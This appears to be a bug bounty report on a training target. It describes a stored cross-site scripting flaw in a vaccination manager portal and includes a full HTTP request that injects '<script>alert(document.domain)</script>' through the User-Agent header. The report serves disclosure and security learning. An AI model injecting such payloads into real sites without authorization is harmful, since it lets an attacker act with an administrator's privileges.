BugBountyHunter

Hey!

I found a stored XSS on the /vaccination-manager/portal.php endpoint. This is caused by the unsanitized User Agent that is reflected on the page.

To replicate this, submit any proof of vaccination via POST /vaccination-manager/pub/upload-vaccination-proof.php but edit your User-Agent to <script>alert(document.domain)</script>. Then visit the vaccination manager portal.

Example request:

POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Host: feed57cd088f-0x1452.a.firstbloodhackers.com
Cookie: vaccination_manager=67585788fd21208dd2732239ced72f1dafaac443534b2d2dc42a8ad25d453ff1
Content-Length: 13068
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://feed57cd088f-0x1452.a.firstbloodhackers.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBfhqG69DtLRDlh5Y
User-Agent: <script>alert(document.domain)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://feed57cd088f-0x1452.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryBfhqG69DtLRDlh5Y
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryBfhqG69DtLRDlh5Y
Content-Disposition: form-data; name="vaccination_proof"; filename="img.jpg"
Content-Type: image/jpeg

...
------WebKitFormBoundaryBfhqG69DtLRDlh5Y--

Impact

An attacker can use this to cause XSS when an admin visits the vaccination manager portal. While the vaccination_manager cookie can't be stolen because it's HttpOnly, the attacker can still use this to perform any action the victim is authorized to.